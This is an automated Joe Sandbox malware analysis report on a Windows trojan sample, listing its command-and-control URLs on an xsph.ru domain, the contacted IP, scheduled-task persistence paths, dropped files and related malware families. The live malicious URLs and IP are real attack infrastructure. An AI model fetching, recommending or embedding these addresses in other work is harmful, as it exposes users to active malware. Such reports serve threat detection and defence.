lnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru	11%	Virustotal		Browse
http://a0985701.xsph.ru/@=AzYyIGNycDO	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgL	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru/@=AzYyIGNycDO	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a0985701.xsph.ru	141.8.192.26	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	true	Avira URL Cloud: malware	unknown
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	true	Avira URL Cloud: malware	unknown
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	true	Avira URL Cloud: malware	unknown
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	true	Avira URL Cloud: malware	unknown
http://a0985701.xsph.ru/@=AzYyIGNycDO	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://a0985701.xsph.ru/	qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://a0985701.xsph.ru	qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6	qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	blockServerruntime.exe, 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgL	qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.192.26	a0985701.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447088
Start date and time:	2024-05-24 11:06:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	N0tepkRPzw.exe renamed because original name is a hash value
Original Sample Name:	4b173aaa031de977353ca903f23520e4.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@34/19@1/1
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 55% Number of executed functions: 356 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target blockServerruntime.exe, PID 7436 because it is empty
Execution Graph export aborted for target qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PID 7604 because it is empty
Execution Graph export aborted for target qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PID 7628 because it is empty
Execution Graph export aborted for target qVUjshNEHYUOCXyHyUMQwFlZoe.exe, PID 7992 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:07:07	API Interceptor	2389586x Sleep call for process: qVUjshNEHYUOCXyHyUMQwFlZoe.exe modified
10:07:04	Task Scheduler	Run new task: qVUjshNEHYUOCXyHyUMQwFlZoe path: "C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
10:07:04	Task Scheduler	Run new task: qVUjshNEHYUOCXyHyUMQwFlZoeq path: "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
10:07:07	Task Scheduler	Run new task: RuntimeBroker path: "C:\Windows\addins\RuntimeBroker.exe"
10:07:07	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Windows\addins\RuntimeBroker.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.192.26	PO17276_1.xlsx	Get hash	malicious	Unknown	Browse	a0914823.xsph.ru/gnTMibhIiOzpiLP.exe
	SecuriteInfo.com.Win32.Evo-gen.8496.14358.exe	Get hash	malicious	SmokeLoader	Browse	a0907287.xsph.ru/logo5.jpg
	SecuriteInfo.com.Win32.PWSX-gen.5385.30597.exe	Get hash	malicious	SmokeLoader	Browse	a0907287.xsph.ru/logo5.jpg
	SecuriteInfo.com.Win32.TrojanX-gen.7072.18749.exe	Get hash	malicious	SmokeLoader	Browse	a0907287.xsph.ru/logo5.jpg
	SecuriteInfo.com.Win32.TrojanX-gen.31311.19858.exe	Get hash	malicious	SmokeLoader	Browse	a0907287.xsph.ru/logo5.jpg
	INV_568790.doc	Get hash	malicious	AgentTesla, NSISDropper	Browse	a0862713.xsph.ru/ikeolive2.1.exe
	z35INV-A66G-B100.exe	Get hash	malicious	FormBook	Browse	www.edunaberu.ru/rudh/?DMeivvtJ=Qb71IDR1ga914x9jJav7ZQHcC3mf/ed4A6zWICGLDRYD2yYRZk0hL6cqBbjUi/cBqZKD2YXD8Fm/1DQGVxm9xs0aXvoVpD5urw==&4A2NU=8-R860
	https://drive.google.com/file/d/1nqpk7RY2QNDanRjehWlT7FCVTr0VWDO4/view?usp=sharing	Get hash	malicious	Unknown	Browse	a0698327.xsph.ru/imn/m/assets/images/img.jpg
	bkXzo46fUj.exe	Get hash	malicious	Azorult	Browse	a0528438.xsph.ru/index.php
	bPIaXZBdd0.exe	Get hash	malicious	Unknown	Browse	a0519283.xsph.ru/gate.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	YEaSisD9EC.exe	Get hash	malicious	DCRat	Browse	141.8.192.6
	fZJdSLj7X8.exe	Get hash	malicious	DCRat	Browse	141.8.192.26
	tlSO7495aR.exe	Get hash	malicious	DCRat	Browse	141.8.192.126
	Transferencia.exe	Get hash	malicious	FormBook, GuLoader	Browse	141.8.192.82
	dIg0MWRViP.exe	Get hash	malicious	Tofsee	Browse	141.8.199.94
	rpzOeQ5QzX.exe	Get hash	malicious	Tofsee	Browse	141.8.199.94
	ckx1nc2UXk.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer, XWorm	Browse	141.8.192.103
	qxHQmnOvjL.exe	Get hash	malicious	DCRat	Browse	141.8.195.33
	9hupFTW1CI.exe	Get hash	malicious	DCRat	Browse	141.8.192.93
	l35QvlkTXb.exe	Get hash	malicious	DCRat	Browse	141.8.197.42

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files (x86)\WindowsPowerShell\Configuration\c4950d50751633

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	ASCII text, with very long lines (613), with no line terminators
Category:	dropped
Size (bytes):	613
Entropy (8bit):	5.890045828119624
Encrypted:	false
SSDEEP:	12:V6CXFfMpllSNxL8tmVIjX5C+93ZPY8WtQb7dqk3fAKYXXY/yn:c0MpllSNF8tP593ZPWtQqq4K+XL
MD5:	C17DEBEB7D3B23062C057988F4D66ED5
SHA1:	3F29B4465BEC3D39B68DB04AB489AC73400B7531
SHA-256:	7E05ABAB79B820C6984D8CA422C42B4DDC7319E666C440BD7F7EFADD3B1FBD37
SHA-512:	23C8B555C665ED3E0EA9964913F1970200FD44131EB57DB8FC93DA0CA13F179BE8637FA0901F9C35368160601F4C5FDD4809D0FA91450CF7DD4CC9978781877E
Malicious:	false
Preview:	YQDtjI1l9MZ3TEHp1EcBK6QTvWTjK7ATeuoxcUnv5NoqaCn8FChShLbcAu8NzSaBLGYiaTMhaqG6Sj2ssUeIZrwSTMxsWa6mwmfUnFiv0A11FeJa2PefySldTGONfeKAudKpEiEmvsRZz4NyCX0G6axdBBAh0UQW01GlUeVTL1tGAMnY2aLInEDTpqnChgwac5i8yleiBg5EqrczXloaJHsvxx5o0SwoFSoFnpkR6nHHJ9m8Nyp61VRUNxKApzrsuQ8XCXLrAXegAkmyK6bBn0wtBT10fkmG5ZX2BO6zn75e1uUnLVzsYqE3dOVtgVLauXlkMtx6AlYp4R1R8OpJu3sPUdZw2NTRvfueJuabi3rwRY9LWEuRqBp1oWQtUADxSH4ZhXIOyNl1L675eNZycBltz2zwdrHiz4dKeko95fcdaypsYUOGkPUQgKjohVuHFCBRcxb4ja26iHTANGYJcA7kjNoUA9bkuVXXxXQk3UhKXXrY0jab6lpFFbrPJG3j8SMNu5N00yQHcwMLfQdbiAnJqRSVpBbwb8LELen5VkkIVimTOgt3ncB8pChcn2KzWeqekI9BmiG7ZeyIp8GJRiI86NZI7KRcavv11

C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Download File

Process:	C:\bridgeportserver\blockServerruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1257984
Entropy (8bit):	6.954385369050077
Encrypted:	false
